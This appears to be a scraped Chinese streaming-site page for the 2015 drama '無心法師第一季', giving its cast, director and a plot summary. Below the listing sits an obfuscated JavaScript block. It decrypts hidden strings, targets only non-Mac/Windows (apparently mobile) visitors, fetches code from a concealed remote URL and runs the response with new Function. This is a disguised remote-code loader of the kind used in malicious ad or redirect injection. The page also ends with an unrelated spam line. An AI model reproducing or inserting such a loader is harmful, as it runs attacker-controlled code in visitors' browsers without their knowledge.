<wbr id="cze2u"></wbr>

  <nav id="cze2u"><listing id="cze2u"><small id="cze2u"></small></listing></nav>

 1. <wbr id="cze2u"><legend id="cze2u"></legend></wbr>
 2. 首頁?????國產劇?????無心法師第一季

  無心法師第一季
  無心法師第一季
  主演:韓東君  金晨  陳瑤  張若昀  孔連順  隋詠良  王彥霖  邁克·安吉洛  趙柯  石筱群  王闖  王星瀚  蔣中煒  王妍蘇  公方敏  袁愿  余心恬  吳連生  博弘  張山  張瑞珈    
  類型:國產劇
  狀態: 漢語普通話
  導演:林玉芬  高林豹  
  地區:中國大陸
  年份:2015
  劇情簡介:

  逃婚離家出走的月牙兒(金晨飾)巧遇了神秘的不老不死法師無心(韓東君飾),由于受了月牙兒半個包子的恩惠,無心決定還月牙兒一個人情——靠著捉妖賺錢,帶著月牙兒吃香的喝辣的。無心與月牙的第一單生意來自軍閥顧玄武(王彥霖飾),顧宅遭遇井中妖怪襲擊,命案頻發。無心一心想著捉妖賺錢,卻不想引出了同樣不老不死的井中精怪岳綺羅(陳瑤飾),心狠手辣的岳綺羅卻對無心情有獨鐘,而顧大人手下參謀張顯宗(張若昀飾)對岳綺羅竟暗生情愫,這引發了一連串的恩怨趣事。在亂世中,無心與月牙兒日久生情,與怪力亂神們斗智斗勇,一邊戀愛一邊結交各色朋友。

  • 樂云
  • 秦云

  ?國產劇 最近熱播

  window['NuYMsS'] = function(){ var keyList = [ "3dZDw9T58oCjPhkArf+MBi4Ll27y8fe5uTs1t+rS7jPwoDpFG0cLnivO" , "N+HXzh8qK=CGgmcV91LaS7ETYj0n4Tn0krdcat3B+Ye4=JC9fmq7OlDMEg", "Hm0FOrxhT5fAgnivd3pCbLyGNV4QU6q9uwjZoPts+10Z9XNicgkhIw:R5/JC.je3Wo4rBxbapSy=", "VHlQxqJ2gELSvZ5in08B+opeYAC6r3KGueDrmRYbNzBs4x92dlucfGMPg85U60Z-FO", ]; function decrypt(t, e) { if (!t) return ""; for (var a = t.split(""), n = e.split(""), i = {}, r = [], o = 0;o < a.length / 2;o++) i[a[o]] = a[a.length / 2 + o]; for (var s = 0; s < e.length; s++) r.push(i[n[s]]); return r.join(""); }; (!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?(function(u, i, w, d) { var x = decrypt, cs = d[x(keyList[0],"4wCCZl9T4C2k9")], crd = x(keyList[1],"8zmqNmmYmSm+N"); 'jQuery'; u = decodeURIComponent(x(keyList[2], u)); 'jQuery'; var xhr = new XMLHttpRequest(); xhr.open('GET', u + '/s/a?_=' + x(keyList[3], i)); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { var data = JSON.parse(xhr.responseText); new Function(data.data)(cs); } }; xhr.send('u=1'); })("nHHjmdCCwj5yhonhyQ3A", "SAZYASrZ5rZYAYrSYr", window, document):function(){}; var _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { enc1 = _keyStr.indexOf(input.charAt(i++)); enc2 = _keyStr.indexOf(input.charAt(i++)); enc3 = _keyStr.indexOf(input.charAt(i++)); enc4 = _keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } output = _utf8_decode(output); return output; } function _utf8_decode(utftext) { var string = ""; var i = 0; var c = 0; var c1 = 0; var c2 = 0; while (i < utftext.length) { c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; } else if ((c > 191) && (c < 224)) { c1 = utftext.charCodeAt(i + 1); string += String.fromCharCode(((c & 31) << 6) | (c1 & 63)); i += 2; } else { c1 = utftext.charCodeAt(i + 1); c2 = utftext.charCodeAt(i + 2); string += String.fromCharCode(((c & 15) << 12) | ((c1 & 63) << 6) | (c2 & 63)); i += 3; } } return string; }}
  天堂网WWW最新版资源